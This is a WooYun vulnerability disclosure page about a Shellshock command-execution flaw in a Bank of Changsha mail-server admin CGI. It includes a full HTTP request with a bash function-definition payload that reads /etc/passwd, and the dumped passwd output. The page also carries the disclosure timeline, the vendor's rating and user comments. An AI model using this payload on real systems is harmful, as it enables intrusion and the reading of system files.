长沙银行某系统命令执行漏洞

  • 2
  • 232 views
  • A+
所属分类:乌云漏洞
摘要

2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2014-78919

漏洞标题: 长沙银行某系统命令执行漏洞

相关厂商: 长沙银行

漏洞作者: 拖鞋王子

提交时间: 2014-10-13 00:18

公开时间: 2014-11-25 00:22

漏洞类型: 系统/服务运维配置不当

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 第三方不可信程序 安全意识不足 安全意识不足

1人收藏


漏洞详情

披露状态:

2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向核心白帽子及相关领域专家公开
2014-11-04: 细节向普通白帽子公开
2014-11-14: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

用神器一看今天发现长沙银行某重要内部系统依旧命令执行

详细说明:

code 区域
GET /cgi-bin/madmin.cgi HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
X-Test: () { :;};a=`/bin/cat /etc/passwd`;echo $a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en,zh-CN;q=0.8,zh;q=0.6,ko;q=0.4,zh-TW;q=0.2,th;q=0.2,ja;q=0.2

漏洞证明:

code 区域
HTTP/1.1 200 OK
Date: Fri, 10 Oct 2014 15:42:40 GMT
Server: Mirapoint/4.4.3-GA
root: x:0:0:root:/root:/bin/bash
bin: x:1:1:bin:/bin:/sbin/nologin
daemon: x:2:2:daemon:/sbin:/sbin/nologin
adm: x:3:4:adm:/var/adm:/sbin/nologin
lp: x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync: x:5:0:sync:/sbin:/bin/sync
shutdown: x:6:0:shutdown:/sbin:/sbin/shutdown
halt: x:7:0:halt:/sbin:/sbin/halt
mail: x:8:12:mail:/var/spool/mail:/sbin/nologin
news: x:9:13:news:/etc/news:
uucp: x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator: x:11:0:operator:/root:/sbin/nologin
games: x:12:100:games:/usr/games:/sbin/nologin
gopher: x:13:30:gopher:/var/gopher:/sbin/nologin
ftp: x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody: x:99:99:Nobody:/:/sbin/nologin
vcsa: x:69:69:virtual console memory owner:/dev:/sbin/nologin
monit: x:100:101:monit daemon:/var/lib/monit:/bin/sh
pcap: x:77:77::/var/arpwatch:/sbin/nologin
nscd: x:28:28:NSCD Daemon:/:/sbin/nologin
ntp: x:38:38::/etc/ntp:/sbin/nologin
dbus: x:81:81:System message bus:/:/sbin/nologin
rpc: x:32:32:Portmapper RPC user:/:/sbin/nologin
named: x:25:25:Named:/var/named:/sbin/nologin
sshd: x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
memcached: x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
oprofile: x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
haldaemon: x:68:68:HAL daemon:/:/sbin/nologin
rpcuser: x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody: x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
man: x:500:15::/home/man:/bin/bash
mira: x:70:70::/home/mira:/bin/bash
netdump: x:34:34::/home/netdump:/bin/bash
cyrus: x:70:70::/home/cyrus:/bin/bash
Cache-Control: no-cache
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=GB2312

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=GB2312'>
<META HTTP-EQUIV='Expires' CONTENT='Tue, 04 Dec 1993 21:29:02 GMT'>
<META HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<LINK REL=STYLESHEET TYPE='text/css' HREF='/extras/css/admin.css'>
<LINK REL='SHORTCUT ICON' href='/sa/Mira_bookmark.ico'>

<title>Óʼþ·þÎñÆ÷µÇ¼</title>
<script language=javascript src='/sa/sa.js'>
</script>
</head>
<body class='genLogin' onload='document.forms[0].elements[0].focus()' text='#000000' bgcolor='#efefef' leftmargin='0' topmargin='0'>
<center>
<table border='0' cellpadding='8' cellspacing='0' background='/sa/globe_full.gif' width=800>
<tr>
<td width='230' align=center valign=bottom>&nbsp;</td>
<td width='400' height='108' align=center valign=bottom>&nbsp;</td>
<td align=center valign=bottom>&nbsp;</td>
</tr>
<tr align='left'>
<td colspan='3' valign=bottom>
<table width='545' border='0' cellspacing='0' cellpadding='0'>
<tr>
<td width='201'>&nbsp;</td>
<td width='338'>
<table width='334' height='81' border='0' cellpadding='0' cellspacing='0'>
<tr><td>&nbsp;</td></tr>
</table>
</td>
</tr>
<tr>
<td colspan=2 nowrap align=right>
<font class='genLoginTitle' color='#f5873c'><strong>Óʼþ·þÎñÆ÷µÇ¼</strong></font>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width='230' align=center>&nbsp;</td>
<td align='left' colspan='2'>
<form ACTION='/cgi-bin/madmin.cgi/sa/login.html' NAME='myform' AutoComplete='off'
METHOD='POST' ENCTYPE='application/x-www-form-urlencoded' onSubmit='checkjavascript(myform.browserjs);'>
<table cellspacing=0 cellpadding=0 width=160 bgcolor=#ffffff border=0>
<tr>
<td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/lefttopgrey.gif' width='12' height='12'></td>
<td height=1 valign=top bgcolor='#cccccc'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/righttopgrey.gif' width='12' height='12'></td>
</tr>
<tr>
<td height=11 valign=top bgcolor='#ffffff'></td>
</tr>
<tr>
<td width=1 bgcolor=#cccccc><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td width=11 bgcolor=#ffffff>&nbsp;</td>
<td align='center' valign=top>
<table cellspacing=0 border=0>
<tr>
<td colspan='2' align='right' nowrap>
<font class=text1>±ê×¼Á¬½Ó | <a href='https://**.**.**.**/cgi-bin/madmin.cgi/sa?locale=zs_CN.utf-8L4_3'>°²È«Á¬½Ó</a></font>
</td>
</tr>
<tr>
<td align='right' nowrap>
Óû§£º
</td>
<td>
<input type='text' size='20' name='user' value='' tabindex=1 onkeypress='checkWhich(event, login)'>
</td>
</tr>
<tr>
<td align='right' nowrap>
ÃÜÂ룺
</td>
<td>
<input type='password' size='20' name='password' value='' tabindex=2 onkeypress='checkWhich(event, login)'>
</td>
</tr>
<tr>
<td>
&nbsp;
</td>
<td align='right'>
<input type='submit' name='login' value='怬' tabindex=3 class='btn'>
</td>
</tr>
</table>
</td>
<td width=11 bgcolor=#ffffff><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td width=1 bgcolor=#cccccc></td>
</tr>
<tr>
<td colspan='2' rowspan='2' align='left' valign='top' bgcolor='efefef'><img src='/sa/leftbotgrey.gif' width='12' height='12'></td>
<td height='11' valign=top bgcolor='#ffffff'><img height=1 alt='' src='/sa/ts.gif' width=1 border=0></td>
<td colspan='2' rowspan='2' align='right' valign='top' bgcolor='efefef'><img src='/sa/rightbotgrey.gif' width='12' height='12'></td>
</tr>
<tr>
<td height='1' valign=top bgcolor='#cccccc'></td>
</tr>
</table>
<input type='hidden' name='timestamp' value='1412955760'>
<input type='hidden' name='locale' value='zs_CN.utf-8L4_3'>
<input type='hidden' name='browserjs' value='false'>
<input type='hidden' name='mutual_lock' value=''>
</form>
</td>
</tr>
<tr>
<td height='65' colspan='3'>
&nbsp;
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan='2' align='left'>
<font class=text1><B>µÇ¼</B>£º <span class='genDataHilite' color='#ff0000'>Óʼþ·þÎñÆ÷δ¾­Ðí¿É</span> &nbsp;</font>
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan='2' align='left'>

<a href='/cgi-bin/madmin.cgi/sa/login.html?locale=en_US.ISO_8859-1'>
<nobr>Ó¢Óï</nobr></a> -
<a href='/cgi-bin/madmin.cgi/sa/login.html?locale=ja_JP.utf-8'>
<nobr>ÈÕÓï</nobr></a> -
<a name='/cgi-bin/madmin.cgi/sa/login.html?locale=zs_CN.utf-8L4_3'>
<nobr>¼òÌåÖÐÎÄ</nobr></a>
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan='2' align='left'>
<font class=text1></font>
</td>
</tr>
</table>
</center>
</body>
</html>

修复方案:

版权声明:转载请注明来源 拖鞋王子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-10-15 17:40

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-10-11 01:01 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    0

    http://loudong.360.cn/vul/info/id/25287 http://loudong.360.cn/vul/info/id/25284 不知道是不是一样的[email protected] @疯狗

  2. 2014-10-11 08:18 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    @袋鼠妈妈 是一样的

  3. 2014-10-11 09:28 | 氓氓童鞋 ( 普通白帽子 | Rank:374 漏洞数:65 )

    0

    @袋鼠妈妈 @U神 好多都是两个平台都发一遍。。。。这风气

  4. 2014-10-11 12:37 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    0

    扔完库带仍乌云………这真特么的机制……

  5. 2014-10-11 12:44 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    0

    @红客十年 因为裤带会查是否重复...wooyun不会 哈哈

  6. 2014-10-11 12:54 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    1

    会不会封id啊?

  7. 2014-10-11 13:38 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    1

    我只是进来看看的。

  8. 2014-10-11 15:11 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    0

    裤带的不是不公开看吗

  9. 2014-10-11 17:41 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    小伙子,不带你这么玩的啊

  10. 2014-10-11 23:22 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    0

    小伙子,不带你这么玩的啊

  11. 2014-11-28 08:03 | 老妖 ( 路人 | Rank:22 漏洞数:3 )

    1

    神器是啥?